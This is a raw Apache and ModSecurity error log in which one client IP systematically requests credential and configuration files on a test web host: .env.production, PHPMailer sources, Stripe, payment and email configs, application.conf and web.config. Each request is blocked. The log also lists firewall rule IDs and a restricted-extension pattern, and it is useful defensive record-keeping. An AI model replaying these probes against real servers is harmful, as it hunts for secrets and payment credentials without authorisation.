[Fri Jan 16 03:16:28.369173 2026] [:error] [pid 1444226] [client 45.148.10.246:50320] [client 45.148.10.246] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.production"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env.production"] [unique_id "aWmffGcpoCUgeFICb0bduwAAAAY"], referer: http://economiasolidale.test.indacotrentino.com/./.env.production
[Fri Jan 16 03:16:28.369398 2026] [:error] [pid 1444226] [client 45.148.10.246:50320] [client 45.148.10.246] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env.production"] [unique_id "aWmffGcpoCUgeFICb0bduwAAAAY"], referer: http://economiasolidale.test.indacotrentino.com/./.env.production
[Fri Jan 16 03:16:28.369569 2026] [:error] [pid 1444226] [client 45.148.10.246:50320] [client 45.148.10.246] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env.production"] [unique_id "aWmffGcpoCUgeFICb0bduwAAAAY"], referer: http://economiasolidale.test.indacotrentino.com/./.env.production
[Fri Jan 16 03:17:18.131681 2026] [authz_core:error] [pid 1444031] [client 45.148.10.246:51394] AH01630: client denied by server configuration: /var/www/magento.test.indacotrentino.com/www/vendor/phpmailer, referer: http://economiasolidale.test.indacotrentino.com/vendor/phpmailer/phpmailer/src/PHPMailer.php
[Fri Jan 16 03:17:18.287067 2026] [authz_core:error] [pid 1444034] [client 45.148.10.246:51410] AH01630: client denied by server configuration: /var/www/magento.test.indacotrentino.com/www/vendor/phpmailer, referer: http://economiasolidale.test.indacotrentino.com/vendor/phpmailer/phpmailer/src/PHPMailer.php/
[Fri Jan 16 03:17:18.482876 2026] [authz_core:error] [pid 1444032] [client 45.148.10.246:51426] AH01630: client denied by server configuration: /var/www/magento.test.indacotrentino.com/www/vendor/phpmailer, referer: http://economiasolidale.test.indacotrentino.com//vendor/phpmailer/phpmailer/src/PHPMailer.php
[Fri Jan 16 03:17:18.601454 2026] [authz_core:error] [pid 1444040] [client 45.148.10.246:51440] AH01630: client denied by server configuration: /var/www/magento.test.indacotrentino.com/www/vendor/phpmailer, referer: http://economiasolidale.test.indacotrentino.com/./vendor/phpmailer/phpmailer/src/PHPMailer.php
[Fri Jan 16 03:17:18.742510 2026] [authz_core:error] [pid 1444035] [client 45.148.10.246:51454] AH01630: client denied by server configuration: /var/www/magento.test.indacotrentino.com/www/vendor/phpmailer, referer: http://economiasolidale.test.indacotrentino.com/vendor/phpmailer/phpmailer/src/SMTP.php
[Fri Jan 16 03:17:18.915513 2026] [authz_core:error] [pid 1444033] [client 45.148.10.246:51468] AH01630: client denied by server configuration: /var/www/magento.test.indacotrentino.com/www/vendor/phpmailer, referer: http://economiasolidale.test.indacotrentino.com/vendor/phpmailer/phpmailer/src/SMTP.php/
[Fri Jan 16 03:17:19.071616 2026] [authz_core:error] [pid 1444031] [client 45.148.10.246:51470] AH01630: client denied by server configuration: /var/www/magento.test.indacotrentino.com/www/vendor/phpmailer, referer: http://economiasolidale.test.indacotrentino.com//vendor/phpmailer/phpmailer/src/SMTP.php
[Fri Jan 16 03:17:19.249402 2026] [authz_core:error] [pid 1444034] [client 45.148.10.246:51482] AH01630: client denied by server configuration: /var/www/magento.test.indacotrentino.com/www/vendor/phpmailer, referer: http://economiasolidale.test.indacotrentino.com/./vendor/phpmailer/phpmailer/src/SMTP.php
[Fri Jan 16 03:17:19.402290 2026] [authz_core:error] [pid 1444032] [client 45.148.10.246:47864] AH01630: client denied by server configuration: /var/www/magento.test.indacotrentino.com/www/vendor/phpmailer, referer: http://economiasolidale.test.indacotrentino.com/vendor/phpmailer/phpmailer/class.phpmailer.php
[Fri Jan 16 03:17:21.640893 2026] [authz_core:error] [pid 1444033] [client 45.148.10.246:47942] AH01630: client denied by server configuration: /var/www/magento.test.indacotrentino.com/www/lib/phpmailer, referer: http://economiasolidale.test.indacotrentino.com/lib/phpmailer/class.phpmailer.php
[Fri Jan 16 03:17:21.758289 2026] [authz_core:error] [pid 1444031] [client 45.148.10.246:47948] AH01630: client denied by server configuration: /var/www/magento.test.indacotrentino.com/www/lib/phpmailer, referer: http://economiasolidale.test.indacotrentino.com/lib/phpmailer/class.phpmailer.php/
[Fri Jan 16 03:17:21.891826 2026] [authz_core:error] [pid 1444034] [client 45.148.10.246:47956] AH01630: client denied by server configuration: /var/www/magento.test.indacotrentino.com/www/lib/phpmailer, referer: http://economiasolidale.test.indacotrentino.com//lib/phpmailer/class.phpmailer.php
[Fri Jan 16 03:17:22.017760 2026] [authz_core:error] [pid 1444032] [client 45.148.10.246:47972] AH01630: client denied by server configuration: /var/www/magento.test.indacotrentino.com/www/lib/phpmailer, referer: http://economiasolidale.test.indacotrentino.com/./lib/phpmailer/class.phpmailer.php
[Fri Jan 16 03:17:22.138827 2026] [authz_core:error] [pid 1444040] [client 45.148.10.246:47978] AH01630: client denied by server configuration: /var/www/magento.test.indacotrentino.com/www/lib/PHPMailer, referer: http://economiasolidale.test.indacotrentino.com/lib/PHPMailer/class.phpmailer.php
[Fri Jan 16 03:17:22.301399 2026] [authz_core:error] [pid 1444035] [client 45.148.10.246:47992] AH01630: client denied by server configuration: /var/www/magento.test.indacotrentino.com/www/lib/PHPMailer, referer: http://economiasolidale.test.indacotrentino.com/lib/PHPMailer/class.phpmailer.php/
[Fri Jan 16 03:17:22.456298 2026] [authz_core:error] [pid 1444033] [client 45.148.10.246:48002] AH01630: client denied by server configuration: /var/www/magento.test.indacotrentino.com/www/lib/PHPMailer, referer: http://economiasolidale.test.indacotrentino.com//lib/PHPMailer/class.phpmailer.php
[Fri Jan 16 03:17:22.714324 2026] [authz_core:error] [pid 1444031] [client 45.148.10.246:48012] AH01630: client denied by server configuration: /var/www/magento.test.indacotrentino.com/www/lib/PHPMailer, referer: http://economiasolidale.test.indacotrentino.com/./lib/PHPMailer/class.phpmailer.php
[Fri Jan 16 03:17:28.580950 2026] [authz_core:error] [pid 1444035] [client 45.148.10.246:48334] AH01630: client denied by server configuration: /var/www/magento.test.indacotrentino.com/www/app/Config, referer: http://economiasolidale.test.indacotrentino.com/app/Config/Email.php
[Fri Jan 16 03:17:28.771959 2026] [authz_core:error] [pid 1444033] [client 45.148.10.246:48340] AH01630: client denied by server configuration: /var/www/magento.test.indacotrentino.com/www/app/Config, referer: http://economiasolidale.test.indacotrentino.com/app/Config/Email.php/
[Fri Jan 16 03:17:28.903447 2026] [authz_core:error] [pid 1444031] [client 45.148.10.246:48342] AH01630: client denied by server configuration: /var/www/magento.test.indacotrentino.com/www/app/Config, referer: http://economiasolidale.test.indacotrentino.com//app/Config/Email.php
[Fri Jan 16 03:17:29.509210 2026] [authz_core:error] [pid 1444034] [client 45.148.10.246:41120] AH01630: client denied by server configuration: /var/www/magento.test.indacotrentino.com/www/app/Config, referer: http://economiasolidale.test.indacotrentino.com/app/Config/email.php/
[Fri Jan 16 03:17:29.622639 2026] [authz_core:error] [pid 1444032] [client 45.148.10.246:41124] AH01630: client denied by server configuration: /var/www/magento.test.indacotrentino.com/www/app/Config, referer: http://economiasolidale.test.indacotrentino.com//app/Config/email.php
[Fri Jan 16 03:17:29.785828 2026] [authz_core:error] [pid 1444040] [client 45.148.10.246:41126] AH01630: client denied by server configuration: /var/www/magento.test.indacotrentino.com/www/app/Config, referer: http://economiasolidale.test.indacotrentino.com/./app/Config/email.php
[Fri Jan 16 03:17:29.948298 2026] [authz_core:error] [pid 1444035] [client 45.148.10.246:41128] AH01630: client denied by server configuration: /var/www/magento.test.indacotrentino.com/www/app/Config, referer: http://economiasolidale.test.indacotrentino.com/app/Config/Stripe.php
[Fri Jan 16 03:17:30.101874 2026] [authz_core:error] [pid 1444033] [client 45.148.10.246:41144] AH01630: client denied by server configuration: /var/www/magento.test.indacotrentino.com/www/app/Config, referer: http://economiasolidale.test.indacotrentino.com/app/Config/Stripe.php/
[Fri Jan 16 03:17:30.290812 2026] [authz_core:error] [pid 1444031] [client 45.148.10.246:41146] AH01630: client denied by server configuration: /var/www/magento.test.indacotrentino.com/www/app/Config, referer: http://economiasolidale.test.indacotrentino.com//app/Config/Stripe.php
[Fri Jan 16 03:17:30.469992 2026] [authz_core:error] [pid 1444034] [client 45.148.10.246:41158] AH01630: client denied by server configuration: /var/www/magento.test.indacotrentino.com/www/app/Config, referer: http://economiasolidale.test.indacotrentino.com/./app/Config/Stripe.php
[Fri Jan 16 03:17:30.634630 2026] [authz_core:error] [pid 1444032] [client 45.148.10.246:41164] AH01630: client denied by server configuration: /var/www/magento.test.indacotrentino.com/www/app/Config, referer: http://economiasolidale.test.indacotrentino.com/app/Config/stripe.php
[Fri Jan 16 03:17:30.798841 2026] [authz_core:error] [pid 1444040] [client 45.148.10.246:41166] AH01630: client denied by server configuration: /var/www/magento.test.indacotrentino.com/www/app/Config, referer: http://economiasolidale.test.indacotrentino.com/app/Config/stripe.php/
[Fri Jan 16 03:17:30.956358 2026] [authz_core:error] [pid 1444035] [client 45.148.10.246:41182] AH01630: client denied by server configuration: /var/www/magento.test.indacotrentino.com/www/app/Config, referer: http://economiasolidale.test.indacotrentino.com//app/Config/stripe.php
[Fri Jan 16 03:17:31.122655 2026] [authz_core:error] [pid 1444031] [client 45.148.10.246:41190] AH01630: client denied by server configuration: /var/www/magento.test.indacotrentino.com/www/app/Config, referer: http://economiasolidale.test.indacotrentino.com/./app/Config/stripe.php
[Fri Jan 16 03:17:31.283840 2026] [authz_core:error] [pid 1444034] [client 45.148.10.246:41204] AH01630: client denied by server configuration: /var/www/magento.test.indacotrentino.com/www/app/Config, referer: http://economiasolidale.test.indacotrentino.com/app/Config/Payment.php
[Fri Jan 16 03:17:31.448025 2026] [authz_core:error] [pid 1444032] [client 45.148.10.246:41210] AH01630: client denied by server configuration: /var/www/magento.test.indacotrentino.com/www/app/Config, referer: http://economiasolidale.test.indacotrentino.com/app/Config/Payment.php/
[Fri Jan 16 03:17:31.564324 2026] [authz_core:error] [pid 1444040] [client 45.148.10.246:41220] AH01630: client denied by server configuration: /var/www/magento.test.indacotrentino.com/www/app/Config, referer: http://economiasolidale.test.indacotrentino.com//app/Config/Payment.php
[Fri Jan 16 03:17:31.728775 2026] [authz_core:error] [pid 1444226] [client 45.148.10.246:41230] AH01630: client denied by server configuration: /var/www/magento.test.indacotrentino.com/www/app/Config, referer: http://economiasolidale.test.indacotrentino.com/./app/Config/Payment.php
[Fri Jan 16 03:17:31.857434 2026] [authz_core:error] [pid 1444035] [client 45.148.10.246:41246] AH01630: client denied by server configuration: /var/www/magento.test.indacotrentino.com/www/app/Config, referer: http://economiasolidale.test.indacotrentino.com/app/Config/payment.php
[Fri Jan 16 03:17:32.429275 2026] [authz_core:error] [pid 1444032] [client 45.148.10.246:41264] AH01630: client denied by server configuration: /var/www/magento.test.indacotrentino.com/www/app/Config, referer: http://economiasolidale.test.indacotrentino.com/./app/Config/payment.php
[Fri Jan 16 03:17:35.851302 2026] [authz_core:error] [pid 1444226] [client 45.148.10.246:41470] AH01630: client denied by server configuration: /var/www/magento.test.indacotrentino.com/www/app/Config, referer: http://economiasolidale.test.indacotrentino.com/app/Config/email.php
[Fri Jan 16 03:17:36.075264 2026] [authz_core:error] [pid 1444035] [client 45.148.10.246:41476] AH01630: client denied by server configuration: /var/www/magento.test.indacotrentino.com/www/app/Config, referer: http://economiasolidale.test.indacotrentino.com/app/Config/email.php/
[Fri Jan 16 03:17:36.229872 2026] [authz_core:error] [pid 1444031] [client 45.148.10.246:41488] AH01630: client denied by server configuration: /var/www/magento.test.indacotrentino.com/www/app/Config, referer: http://economiasolidale.test.indacotrentino.com//app/Config/email.php
[Fri Jan 16 03:17:36.406982 2026] [authz_core:error] [pid 1444034] [client 45.148.10.246:41492] AH01630: client denied by server configuration: /var/www/magento.test.indacotrentino.com/www/app/Config, referer: http://economiasolidale.test.indacotrentino.com/./app/Config/email.php
[Fri Jan 16 03:17:36.562107 2026] [authz_core:error] [pid 1444032] [client 45.148.10.246:41496] AH01630: client denied by server configuration: /var/www/magento.test.indacotrentino.com/www/app/Config, referer: http://economiasolidale.test.indacotrentino.com/app/Config/stripe.php
[Fri Jan 16 03:17:36.690737 2026] [authz_core:error] [pid 1444040] [client 45.148.10.246:41510] AH01630: client denied by server configuration: /var/www/magento.test.indacotrentino.com/www/app/Config, referer: http://economiasolidale.test.indacotrentino.com/app/Config/stripe.php/
[Fri Jan 16 03:17:36.889659 2026] [authz_core:error] [pid 1444226] [client 45.148.10.246:41516] AH01630: client denied by server configuration: /var/www/magento.test.indacotrentino.com/www/app/Config, referer: http://economiasolidale.test.indacotrentino.com//app/Config/stripe.php
[Fri Jan 16 03:17:37.050902 2026] [authz_core:error] [pid 1444035] [client 45.148.10.246:41528] AH01630: client denied by server configuration: /var/www/magento.test.indacotrentino.com/www/app/Config, referer: http://economiasolidale.test.indacotrentino.com/./app/Config/stripe.php
[Fri Jan 16 03:17:37.201953 2026] [authz_core:error] [pid 1444031] [client 45.148.10.246:41544] AH01630: client denied by server configuration: /var/www/magento.test.indacotrentino.com/www/app/Config, referer: http://economiasolidale.test.indacotrentino.com/app/Config/core.php
[Fri Jan 16 03:17:37.377385 2026] [authz_core:error] [pid 1444034] [client 45.148.10.246:41548] AH01630: client denied by server configuration: /var/www/magento.test.indacotrentino.com/www/app/Config, referer: http://economiasolidale.test.indacotrentino.com/app/Config/core.php/
[Fri Jan 16 03:17:37.553739 2026] [authz_core:error] [pid 1444032] [client 45.148.10.246:41556] AH01630: client denied by server configuration: /var/www/magento.test.indacotrentino.com/www/app/Config, referer: http://economiasolidale.test.indacotrentino.com//app/Config/core.php
[Fri Jan 16 03:17:37.687621 2026] [authz_core:error] [pid 1444040] [client 45.148.10.246:41568] AH01630: client denied by server configuration: /var/www/magento.test.indacotrentino.com/www/app/Config, referer: http://economiasolidale.test.indacotrentino.com/./app/Config/core.php
[Fri Jan 16 03:17:53.912315 2026] [authz_core:error] [pid 1444040] [client 45.148.10.246:40310] AH01630: client denied by server configuration: /var/www/magento.test.indacotrentino.com/www/app/settings.php, referer: http://economiasolidale.test.indacotrentino.com/app/settings.php
[Fri Jan 16 03:18:04.026868 2026] [authz_core:error] [pid 1444226] [client 45.148.10.246:45752] AH01630: client denied by server configuration: /var/www/magento.test.indacotrentino.com/www/app/config, referer: http://economiasolidale.test.indacotrentino.com/app/config/config.php
[Fri Jan 16 03:18:04.421257 2026] [authz_core:error] [pid 1444034] [client 45.148.10.246:45772] AH01630: client denied by server configuration: /var/www/magento.test.indacotrentino.com/www/app/config, referer: http://economiasolidale.test.indacotrentino.com//app/config/config.php
[Fri Jan 16 03:18:04.555350 2026] [authz_core:error] [pid 1444032] [client 45.148.10.246:45782] AH01630: client denied by server configuration: /var/www/magento.test.indacotrentino.com/www/app/config, referer: http://economiasolidale.test.indacotrentino.com/./app/config/config.php
[Fri Jan 16 03:18:04.761098 2026] [authz_core:error] [pid 1444040] [client 45.148.10.246:45788] AH01630: client denied by server configuration: /var/www/magento.test.indacotrentino.com/www/app/config, referer: http://economiasolidale.test.indacotrentino.com/app/config/services.php
[Fri Jan 16 03:18:04.894144 2026] [authz_core:error] [pid 1444031] [client 45.148.10.246:45804] AH01630: client denied by server configuration: /var/www/magento.test.indacotrentino.com/www/app/config, referer: http://economiasolidale.test.indacotrentino.com/app/config/services.php/
[Fri Jan 16 03:18:05.025496 2026] [authz_core:error] [pid 1444226] [client 45.148.10.246:45814] AH01630: client denied by server configuration: /var/www/magento.test.indacotrentino.com/www/app/config, referer: http://economiasolidale.test.indacotrentino.com//app/config/services.php
[Fri Jan 16 03:18:05.186863 2026] [authz_core:error] [pid 1444035] [client 45.148.10.246:45828] AH01630: client denied by server configuration: /var/www/magento.test.indacotrentino.com/www/app/config, referer: http://economiasolidale.test.indacotrentino.com/./app/config/services.php
[Fri Jan 16 03:18:19.393567 2026] [:error] [pid 1444033] [client 45.148.10.246:44816] [client 45.148.10.246] ModSecurity: Warning. String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .rdb/ .resources/ .resx/ .sql/ .swp/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/share/modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "997"] [id "920440"] [msg "URL file extension is restricted by policy"] [data ".conf"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/conf/application.conf"] [unique_id "aWmf69LJkp65ULFQ2YYiLgAAAAI"], referer: http://economiasolidale.test.indacotrentino.com/conf/application.conf
[Fri Jan 16 03:18:19.393920 2026] [:error] [pid 1444033] [client 45.148.10.246:44816] [client 45.148.10.246] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/conf/application.conf"] [unique_id "aWmf69LJkp65ULFQ2YYiLgAAAAI"], referer: http://economiasolidale.test.indacotrentino.com/conf/application.conf
[Fri Jan 16 03:18:19.394084 2026] [:error] [pid 1444033] [client 45.148.10.246:44816] [client 45.148.10.246] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/conf/application.conf"] [unique_id "aWmf69LJkp65ULFQ2YYiLgAAAAI"], referer: http://economiasolidale.test.indacotrentino.com/conf/application.conf
[Fri Jan 16 03:18:19.728219 2026] [:error] [pid 1444031] [client 45.148.10.246:44836] [client 45.148.10.246] ModSecurity: Warning. String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .rdb/ .resources/ .resx/ .sql/ .swp/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/share/modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "997"] [id "920440"] [msg "URL file extension is restricted by policy"] [data ".conf"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/conf/application.conf"] [unique_id "aWmf63-9MmrgwjmYTAJS2wAAAAA"], referer: http://economiasolidale.test.indacotrentino.com//conf/application.conf
[Fri Jan 16 03:18:19.728569 2026] [:error] [pid 1444031] [client 45.148.10.246:44836] [client 45.148.10.246] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/conf/application.conf"] [unique_id "aWmf63-9MmrgwjmYTAJS2wAAAAA"], referer: http://economiasolidale.test.indacotrentino.com//conf/application.conf
[Fri Jan 16 03:18:19.728738 2026] [:error] [pid 1444031] [client 45.148.10.246:44836] [client 45.148.10.246] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/conf/application.conf"] [unique_id "aWmf63-9MmrgwjmYTAJS2wAAAAA"], referer: http://economiasolidale.test.indacotrentino.com//conf/application.conf
[Fri Jan 16 03:18:19.905892 2026] [:error] [pid 1444226] [client 45.148.10.246:44842] [client 45.148.10.246] ModSecurity: Warning. String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .rdb/ .resources/ .resx/ .sql/ .swp/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/share/modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "997"] [id "920440"] [msg "URL file extension is restricted by policy"] [data ".conf"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/conf/application.conf"] [unique_id "aWmf62cpoCUgeFICb0beywAAAAY"], referer: http://economiasolidale.test.indacotrentino.com/./conf/application.conf
[Fri Jan 16 03:18:19.906217 2026] [:error] [pid 1444226] [client 45.148.10.246:44842] [client 45.148.10.246] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/conf/application.conf"] [unique_id "aWmf62cpoCUgeFICb0beywAAAAY"], referer: http://economiasolidale.test.indacotrentino.com/./conf/application.conf
[Fri Jan 16 03:18:19.906397 2026] [:error] [pid 1444226] [client 45.148.10.246:44842] [client 45.148.10.246] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/conf/application.conf"] [unique_id "aWmf62cpoCUgeFICb0beywAAAAY"], referer: http://economiasolidale.test.indacotrentino.com/./conf/application.conf
[Fri Jan 16 03:18:26.278032 2026] [:error] [pid 1444226] [client 45.148.10.246:45134] [client 45.148.10.246] ModSecurity: Warning. String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .rdb/ .resources/ .resx/ .sql/ .swp/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/share/modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "997"] [id "920440"] [msg "URL file extension is restricted by policy"] [data ".config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/web.config"] [unique_id "aWmf8mcpoCUgeFICb0bezwAAAAY"], referer: http://economiasolidale.test.indacotrentino.com/web.config
[Fri Jan 16 03:18:26.278192 2026] [:error] [pid 1444226] [client 45.148.10.246:45134] [client 45.148.10.246] ModSecurity: Warning. Matched phrase "/Web.config" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /Web.config found within REQUEST_FILENAME: /web.config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/web.config"] [unique_id "aWmf8mcpoCUgeFICb0bezwAAAAY"], referer: http://economiasolidale.test.indacotrentino.com/web.config
[Fri Jan 16 03:18:26.278434 2026] [:error] [pid 1444226] [client 45.148.10.246:45134] [client 45.148.10.246] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 10)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/web.config"] [unique_id "aWmf8mcpoCUgeFICb0bezwAAAAY"], referer: http://economiasolidale.test.indacotrentino.com/web.config
[Fri Jan 16 03:18:26.278604 2026] [:error] [pid 1444226] [client 45.148.10.246:45134] [client 45.148.10.246] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 10 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 10, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/web.config"] [unique_id "aWmf8mcpoCUgeFICb0bezwAAAAY"], referer: http://economiasolidale.test.indacotrentino.com/web.config
